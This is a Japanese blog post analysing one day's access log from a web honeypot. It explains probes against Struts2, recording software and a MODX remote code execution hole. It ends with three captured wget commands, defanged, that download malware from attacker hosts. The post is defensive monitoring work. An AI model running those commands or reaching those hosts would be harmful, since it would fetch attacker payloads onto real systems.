WOWHoneypotの簡易分析(58日目)
WOWhoneypotの2018-07-31(運用 日目)の簡易分析です。
本日の総アクセス件数は 56件です。また少ないです。
以下が全アクセスログです。
40 2018-07-31 GET /
7 2018-07-31 GET /index.action
1 2018-07-31 GET /.well-known/security.txt
1 2018-07-31 GET /sitemap.xml
1 2018-07-31 GET /robots.txt
1 2018-07-31 GET /manager/html
1 2018-07-31 GET hxxp://112.124.116.170:83/index.php
1 2018-07-31 GET /foltia/
1 2018-07-31 GET /favicon.ico
1 2018-07-31 GET /epgrec/do-record.sh
1 2018-07-31 GET /connectors/system/phpthumb.php
phpMyAdmin関連(0件)と/を除外したアクセス数です。
7 2018-07-31 GET /index.action
1 2018-07-31 GET /.well-known/security.txt
1 2018-07-31 GET /sitemap.xml
1 2018-07-31 GET /robots.txt
1 2018-07-31 GET /manager/html
1 2018-07-31 GET hxxp://112.124.116.170:83/index.php
1 2018-07-31 GET /foltia/
1 2018-07-31 GET /favicon.ico
1 2018-07-31 GET /epgrec/do-record.sh
1 2018-07-31 GET /connectors/system/phpthumb.php
「GET /index.action」はStruts2の脆弱性を攻撃するもの。
「GET /foltia/」はfoltia ANIME LOCKERというLinux向けのアニメ録画用のOSSパッケージの調査行為、「GET /epgrec/do-record.sh」もLinuxベースでphpとMySQLを使っている録画予約システムへの調査行為です。
「/connectors/system/phpthumb.php」はオープンソースCMSのModx Revolution のRemote Code Executionのようです。7/18に出たもののようです。
https://www.exploit-db.com/exploits/45055/
その他はサイトに対する調査行為と思われます。
本日のハンティングログは以下です。
2 2018-07-31 wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server
2 2018-07-31 wget -c hxxp://103.55.13[.]68:81/server
1 2018-07-31 wget -c hxxp://aaa.linuxa[.]club:57843/linux
以上です。